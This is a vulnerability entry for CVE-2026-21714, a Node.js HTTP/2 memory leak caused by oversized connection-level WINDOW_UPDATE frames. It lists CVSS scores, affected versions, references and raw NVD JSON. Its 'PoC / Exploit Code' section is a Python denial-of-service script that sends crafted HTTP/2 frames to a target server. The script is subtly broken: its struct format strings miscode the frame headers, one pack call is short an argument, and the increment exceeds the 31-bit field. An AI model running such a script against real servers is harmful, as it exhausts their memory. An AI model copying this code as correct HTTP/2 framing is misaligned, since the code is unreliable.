CVE-2026-21714

Description

A memory leak occurs in Node.js HTTP/2 servers when a client sends WINDOW_UPDATE frames on stream 0 (connection-level) that cause the flow control window to exceed the maximum value of 2³¹-1. The server correctly sends a GOAWAY frame, but the Http2Session object is never cleaned up. This vulnerability affects HTTP2 users on Node.js 20, 22, 24 and 25.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Node.js 20.x

Node.js 22.x

Node.js 24.x

Node.js 25.x

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# Target Node.js HTTP/2 Server
HOST = '127.0.0.1'
PORT = 8080

# HTTP/2 Connection Preface
preface = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'

# Settings Frame (Empty ACK to establish connection)
# Length: 0, Type: 4 (SETTINGS), Flags: 1 (ACK), Stream: 0
settings_ack = struct.pack('>HBBBL', 0, 4, 1, 0, 0)

# WINDOW_UPDATE Frame on Stream 0
# Increment value that pushes window > 2^31 - 1
# Length: 4, Type: 8 (WINDOW_UPDATE), Flags: 0, Stream: 0
window_increment = 2**31
window_update_frame = struct.pack('>HBBBLI', 4, 8, 0, 0, window_increment)

def send_exploit():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.send(preface)
    s.send(settings_ack)
    # Send malicious WINDOW_UPDATE to trigger leak
    s.send(window_update_frame)
    print("[+] Malicious WINDOW_UPDATE sent. Check server memory usage.")
    s.close()

if __name__ == "__main__":
    send_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21714
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21714
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21714/
[4] VulDB https://vuldb.com/cve/CVE-2026-21714
[5] https://nodejs.org/en/blog/vulnerability/march-2026-security-releases

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21714", "sourceIdentifier": "[email protected]", "published": "2026-03-30T20:16:19.573", "lastModified": "2026-04-01T14:24:21.833", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A memory leak occurs in Node.js HTTP/2 servers when a client sends WINDOW_UPDATE frames on stream 0 (connection-level) that cause the flow control window to exceed the maximum value of 2³¹-1. The server correctly sends a GOAWAY frame, but the Http2Session object is never cleaned up.\r\n\r\nThis vulnerability affects HTTP2 users on Node.js 20, 22, 24 and 25."}, {"lang": "es", "value": "Se produce una fuga de memoria en servidores HTTP/2 de Node.js cuando un cliente envía tramas WINDOW_UPDATE en el flujo 0 (a nivel de conexión) que hacen que la ventana de control de flujo exceda el valor máximo de 2³¹-1. El servidor envía correctamente una trama GOAWAY, pero el objeto Http2Session nunca se limpia.\n\nEsta vulnerabilidad afecta a los usuarios de HTTP2 en Node.js 20, 22, 24 y 25."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-401"}]}], "references": [{"url": "https://nodejs.org/en/blog/vulnerability/march-2026-security-releases", "source": "[email protected]"}]}}